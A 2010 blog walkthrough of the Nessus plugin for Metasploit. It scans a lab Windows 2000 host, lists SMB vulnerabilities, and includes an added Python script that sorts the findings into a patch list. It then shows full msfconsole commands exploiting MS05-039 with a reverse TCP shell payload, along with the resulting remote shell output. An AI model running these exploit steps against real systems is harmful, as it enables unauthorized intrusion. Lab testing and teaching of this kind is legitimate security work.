
Playing with the Nessus plugin for Metasploit

Contribution: Alexandro Silva

Publication date: October 12, 2010

Recently the developer Zate Berg released a Nessus plug-in for the Metasploit Framework; it is available in the development version of MSF.

For the tests I used the following scenario:

  • Debian host with Nessus and Metasploit
  • Target host running Windows 2000, "buggy to the core"

I first updated MSF and Nessus, and then got on with the fun

cd /tmp/pentest_tools/trunk
svn update
/opt/nessus/sbin/nessus-update-plugins
/opt/nessus/sbin/nessus-service &
./msfconsole


=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 592 exploits - 302 auxiliary
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r10505 updated today (2010.09.28)

msf>

Fun :)

Loading the Nessus plug-in

msf> load nessus

[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
Connecting...
msf> nessus_connect localhost:8834 ok

[+] Username:
alexos
[+] Password:
*******
[*] Connecting to https://localhost:8834/ as alexos
[*] Authenticated
Listing the existing Nessus policies
msf> nessus_policy_list

[+] Nessus Policy List

ID  Name    Owner   visability
--  ----    -----    ----------
1   attack  alexos  private

Starting the scan

msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6

[*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6
[*] Scan started.  uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
With the scan finished, it's time to check the report
msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Host Info

Port  Protocol  Severity  Service Name  Sev 0  Sev 1  Sev 2  Sev 3
----  --------  --------  ------------  -----  -----  -----  -----
0     icmp      1         general       0      2      0      0
0     tcp       3         general       0      9      0      1
0     udp       1         general       0      1      0      0
21    tcp       3         ftp           1      4      2      2
135   tcp       3         epmap         1      1      0      1
135   udp       3         epmap?        0      0      0      1
137   udp       1         netbios-ns    0      1      0      0
139   tcp       1         smb           1      1      0      0
445   tcp       3         cifs          1      10     2      12
1025  tcp       3         dce-rpc       1      1      0      1
1028  udp       1         dce-rpc       0      1      0      0
5800  tcp       1         www           1      4      0      0
5801  tcp       1         www           1      3      0      0
5900  tcp       3         vnc           1      2      0      1
5901  tcp       1         vnc           1      3      0      0
Getting information on the vulnerabilities present on the target's port 445 (smb)
msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

[+] Port Info

Port            Severity  PluginID  Plugin Name                                                                                                           CVSS2  Exploit?  CVE            Risk Factor  CVSS Vector
----            --------  --------  -----------                                                                                                           -----  --------  ---            -----------  -----------
cifs (445/tcp)  1         10736     DCE Services Enumeration                                                                                              none   .         .              None         .
cifs (445/tcp)  1         10785     SMB NativeLanManager Remote System Information Disclosure                                                             none   .         .              None         .
cifs (445/tcp)  1         10394     SMB Log In Possible                                                                                                   none   false     CVE-1999-0504  None         .
cifs (445/tcp)  1         11011     SMB Service Detection                                                                                                 none   .         .              None         .
cifs (445/tcp)  1         10395     SMB Shares Enumeration                                                                                                none   .         .              None         .
cifs (445/tcp)  1         26920     Windows SMB NULL Session Authentication                                                                               none   false     CVE-1999-0519  None         .
cifs (445/tcp)  1         17651     Obtains the password policy                                                                                           none   .         .              None         .
cifs (445/tcp)  3         22034     MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check)           7.5    true      CVE-2006-1314  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
cifs (445/tcp)  3         19407     MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check)  10.0   true      CVE-2005-1984  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         12209     MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check)                                       10.0   true      CVE-2003-0533  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         12054     MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check)                              10.0   true      CVE-2003-0818  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         10859     SMB LsaQueryInformationPolicy Function SID Enumeration                                                                none   true      CVE-2000-1200  None         .
cifs (445/tcp)  3         22194     MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)           10.0   true      CVE-2006-3439  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         19408     MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check)    10.0   true      CVE-2005-1983  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         21193     MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check)           10.0   false     CVE-2005-2120  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  2         18602     SMB svcctl MSRPC Interface SCM Service Enumeration                                                                    5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp)  2         18585     SMB Service Enumeration via \srvsvc                                                                                   5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp)  3         35362     MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)                 10.0   .         CVE-2008-4834  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         26917     SMB Registry : Nessus Cannot Access the Windows Registry                                                              none   .         .              None         .
cifs (445/tcp)  3         18502     MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check)                      10.0   false     CVE-2005-1206  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         11835     MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check)                                      10.0   true      CVE-2003-0715  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  1         10860     SMB Use Host SID to Enumerate Local Users                                                                             none   true      CVE-2000-1200  None         .
cifs (445/tcp)  3         11808     MS03-026: Microsoft RPC Interface Buffer Overrun (823980)                                                             10.0   true      CVE-2003-0352  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         11110     MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830)                      7.5    true      CVE-2002-0724  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
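A report like the one above is only useful once it is turned into a patch list. As an added example (not code from the original post or from the Nessus plugin), the following Python script parses the "Port Info" table exactly as nessus_report_host_detail prints it and orders the findings for remediation, known-exploitable ones first; the sample rows are constructed from the table above with the plugin names condensed.

```python
import re
from collections import namedtuple

# Constructed sample in the layout of the plugin's "Port Info" table
# (rows condensed from the scan above); columns are 2+ spaces apart.
SAMPLE = """\
Port            Severity  PluginID  Plugin Name                                         CVSS2  Exploit?  CVE            Risk Factor  CVSS Vector
----            --------  --------  -----------                                         -----  --------  ---            -----------  -----------
cifs (445/tcp)  1         10394     SMB Log In Possible                                 none   false     CVE-1999-0504  None         .
cifs (445/tcp)  3         19408     MS05-039: Vulnerability in Plug and Play Service    10.0   true      CVE-2005-1983  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  2         18602     SMB svcctl MSRPC Interface SCM Service Enumeration  5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
cifs (445/tcp)  3         35362     MS09-001: Microsoft Windows SMB Vulnerabilities     10.0   .         CVE-2008-4834  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
cifs (445/tcp)  3         22034     MS06-035: Vulnerability in Server Service           7.5    true      CVE-2006-1314  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
"""

# "." in the plugin output means "no data"; CVSS2 prints "none" for info-only plugins.
Finding = namedtuple("Finding", "port severity plugin_id name cvss exploit cve risk vector")

def parse_port_info(text):
    """Parse the table into Finding tuples, skipping header, rule and blank lines.
    Assumes plugin names never contain two consecutive spaces (true for the page)."""
    findings = []
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) != 9 or not cols[1].isdigit():
            continue
        port, sev, pid, name, cvss, expl, cve, risk, vec = cols
        findings.append(Finding(
            port, int(sev), int(pid), name,
            None if cvss == "none" else float(cvss),
            None if expl == "." else expl == "true",   # None = unknown
            None if cve == "." else cve, risk,
            None if vec == "." else vec))
    return findings

def patch_priority(findings):
    """Remediation order: known-exploitable first, then CVSS2, then Nessus severity."""
    return sorted(findings,
                  key=lambda f: (f.exploit is not True, -(f.cvss or 0.0), -f.severity))

def bulletins(findings):
    """Microsoft bulletin IDs (MSyy-nnn) behind the exploitable findings: the patch list."""
    ids = []
    for f in patch_priority(findings):
        m = re.match(r"MS\d{2}-\d{3}", f.name)
        if f.exploit and m and m.group(0) not in ids:
            ids.append(m.group(0))
    return ids
```

Findings whose Exploit? column is "." are kept but sorted after the confirmed ones, so an unknown exploit status never hides a Critical entry from the list.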
Using MSF, I exploited the vulnerability MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution
msf> use exploit/windows/smb/ms05_039_pnp

msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6

msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp

msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3

msf exploit(ms05_039_pnp)> exploit

[*] Started reverse handler on 192.168.0.3:4444
[*] Connecting to the SMB service...
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
[*] Calling the vulnerable function...
[*] Sending stage (240 bytes) to 192.168.0.6
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
[*] Server did not respond, this is expected
[*] The server should have executed our payload


Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.


C:\WINNT\system32>
C:\WINNT\system32> ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.6
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2

These MSF add-ons are always welcome; another interesting integration is Metasploit with Ettercap for MITM testing.

Source: http://blog.alexos.com.br/?p=1996&lang=en

Author's blog - http://www.alexos.org

